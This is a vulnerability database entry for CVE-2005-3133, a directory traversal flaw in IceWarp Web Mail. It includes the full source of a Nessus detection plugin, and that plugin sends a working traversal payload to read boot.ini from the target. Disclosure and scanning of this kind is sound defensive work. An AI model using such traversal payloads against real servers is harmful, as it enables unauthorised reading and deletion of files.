Vulnerabilities > CVE-2005-3133 - Directory Traversal vulnerability in IceWarp Web Mail

CVSS 5.0 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

NONE

Confidentiality impact

NONE

Integrity impact

PARTIAL

Availability impact

NONE

network

low complexity

icewarp

merak

nessus

NVD

Published: 2005-10-04

Updated: 2016-10-18

Summary

Multiple directory traversal vulnerabilities in MERAK Mail Server 8.2.4r with Icewarp Web Mail 5.5.1, and possibly earlier versions, allows remote attackers to (1) delete arbitrary files or directories via a relative path to the id parameter to logout.html or (2) include arbitrary PHP files or other files via the helpid parameter to help.html.

Vulnerable Configurations

Part	Description	Count
Application	Icewarp Icewarp WEB Mail 5.5.1	1
Application	Merak Merak Mail Server 8.2.4R	1

Nessus

NASL family	CGI abuses
NASL id	ICEWARP_WEBMAIL_VULNS4.NASL
description	The remote host is running IceWarp Web Mail - a webmail solution available for the Microsoft Windows platform. The remote version of this software is affected by a directory traversal vulnerability that may allow an attacker to retrieve arbitrary files on the system. Another input validation flaw allows an attacker to delete arbitrary files on the remote host. Note this flaw indicates IceWarp is vulnerable to cross-site scripting attacks too.
last seen	2020-06-01
modified	2020-06-02
plugin id	19784
published	2005-09-30
reporter	This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source	https://www.tenable.com/plugins/nessus/19784
title	IceWarp Web Mail Multiple Flaws (4)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(19784); script_version("1.19"); script_cvs_date("Date: 2018/11/15 20:50:17"); script_cve_id("CVE-2005-3131", "CVE-2005-3132", "CVE-2005-3133"); script_bugtraq_id(14988, 14986, 14980); script_name(english:"IceWarp Web Mail Multiple Flaws (4)"); script_summary(english:"Check the version of IceWarp WebMail"); script_set_attribute(attribute:"synopsis", value: "It is possible to retrieve/delete local files on the remote system through the webmail service." ); script_set_attribute(attribute:"description", value: "The remote host is running IceWarp Web Mail - a webmail solution available for the Microsoft Windows platform. The remote version of this software is affected by a directory traversal vulnerability that may allow an attacker to retrieve arbitrary files on the system. Another input validation flaw allows an attacker to delete arbitrary files on the remote host. Note this flaw indicates IceWarp is vulnerable to cross-site scripting attacks too." ); script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=112810385104168&w=2" ); script_set_attribute(attribute:"solution", value: "Unknown at this time." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:P/A:C"); script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990); script_set_attribute(attribute:"plugin_publication_date", value: "2005/09/30"); script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/30"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:icewarp:webmail"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc."); script_dependencie("icewarp_webmail_vulns.nasl"); script_require_ports("Services/www", 32000); exit(0); } include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); port = get_http_port(default:32000); version = get_kb_item("www/" + port + "/icewarp_webmail/version"); if ( ! version ) exit(0); u = "/accounts/help.html?helpid=../../../../../../../../../../../../boot.ini%00"; w = http_send_recv3(method:"GET", item:u, port:port); if (isnull(w)) exit(0); r = w[2]; r = strstr (r, "[boot loader]"); if (isnull(r)) exit (0); report = string ("It was possible to retrieve the file boot.ini :\n\n", r); security_hole (port:port, extra: report); set_kb_item(name: 'www/'+port+'/XSS', value: TRUE);

Summary

Vulnerable Configurations

Nessus

References